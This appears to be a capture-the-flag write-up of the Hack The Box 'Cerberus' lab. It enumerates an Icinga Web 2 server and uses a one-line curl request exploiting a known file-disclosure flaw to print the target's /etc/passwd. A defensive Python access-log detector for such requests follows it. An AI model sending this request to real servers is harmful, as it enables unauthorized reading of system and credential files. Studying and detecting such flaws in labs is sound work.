Web
Nmap discovered a web server on port 8080 of the target
The running service is Apache httpd 2.4.52 ((Ubuntu))
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl -i http://$IP:8080/
HTTP/1.1 302 Found
date: Wed, 17 Jan 2024 07:15:23 GMT
server: Apache/2.4.52 (Ubuntu)
location: http://icinga.cerberus.local:8080/icingaweb2
content-length: 0
content-type: text/html; charset=UTF-8
The target web server responds with a 302 redirect to http://icinga.cerberus.local:8080/icingaweb2
The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution
- This discovery is rather confusing since the target system is also suspected to be a Domain Controller in an Active Directory environment.
- The web host, icinga.cerberus.local, will be queried against the DNS server
Webroot
The webroot redirects to an Icinga login page
This explains what the web host is named after
Icinga
Icinga is an open-source computer system and network monitoring application. It was originally created as a fork of the Nagios system monitoring application in 2009. It provides a flexible and extensible platform for monitoring diverse IT environments, offering real-time status updates and notifications. Icinga supports both active and passive checks, allowing users to customize monitoring configurations to suit their specific needs.
Icinga is primarily used for monitoring and managing the health, performance, and availability of IT infrastructure components such as servers, networks, and applications. It is commonly employed in enterprise environments and data centers to proactively identify issues, generate alerts, and ensure the continuous operation of critical systems. Icinga’s flexibility and support for various plugins make it suitable for diverse use cases, allowing users to tailor monitoring configurations to their specific requirements.
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ searchsploit icinga
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote | cgi/dos/38882.txt
Icinga Web 2.10 - Arbitrary File Disclosure | php/webapps/51329.py
Icinga Web 2.10 - Authenticated Remote Code Execution | php/webapps/51586.py
----------------------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results
It would appear that Icinga has a history of vulnerabilities with published exploits
About the same result can be seen online as well
While the version information has not been identified at the time of writing, it is worth checking for the recent vulnerabilities, since corresponding public exploits are available for them: [CVE-2022-24716](https://nvd.nist.gov/vuln/detail/CVE-2022-24716) and [CVE-2022-24715](https://nvd.nist.gov/vuln/detail/CVE-2022-24715)
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin
Vulnerable
There is the matthew user that was found during enumerating the KDC earlier
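From the monitoring side, the request shape used above (a host path appended after `/icingaweb2/lib/<vendor>/<library>/`) is easy to spot in the web server's access log. The following is an added example, not part of the original write-up: it assumes Apache's combined log format, and the extension allow-list, the system-directory list and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line and status code from an Apache combined-format log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# /icingaweb2/lib/<vendor>/<library>/<remainder>, the request shape shown above.
LIB_RE = re.compile(r'^/icingaweb2/lib/[^/]+/[^/]+/(?P<rest>.+)$')
# Assumption: legitimate library assets end in one of these extensions.
ASSET_EXT = ('.js', '.css', '.map', '.png', '.svg', '.gif', '.woff', '.woff2', '.ttf', '.less')
# Assumption: first path segments that name host directories, never library assets.
SYSTEM_ROOTS = {'etc', 'proc', 'var', 'home', 'root', 'usr', 'sys', 'tmp'}

# Constructed sample log lines (addresses are documentation ranges, not from the page).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jan/2024:07:20:01 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 1837 "-" "curl/8.4.0"',
    '192.0.2.10 - - [17/Jan/2024:07:20:05 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 404 0 "-" "curl/8.4.0"',
    '198.51.100.7 - - [17/Jan/2024:07:21:12 +0000] "GET /icingaweb2/lib/icinga/icinga-php-library/js/compat/modal.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Jan/2024:07:21:13 +0000] "GET /icingaweb2/authentication/login HTTP/1.1" 200 2301 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return None for unrelated or benign lines, else a dict describing the hit."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Percent-decode before matching so encoded paths are judged by what they resolve to.
    path = unquote(urlsplit(m['target']).path)
    lib = LIB_RE.match(path)
    if not lib:
        return None
    rest = lib['rest']
    reasons = []
    if rest.split('/', 1)[0] in SYSTEM_ROOTS:
        reasons.append('system-path')
    if '..' in rest.split('/'):
        reasons.append('dot-dot')
    if not rest.lower().endswith(ASSET_EXT):
        reasons.append('non-asset-extension')
    if not reasons:
        return None
    # 'served' separates a file that was actually returned from a rejected probe.
    return {'path': path, 'served': m['status'] == '200', 'reasons': reasons}

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to true means the server returned the file and the host should be treated as having disclosed it; a hit with a 404 is a probe that failed.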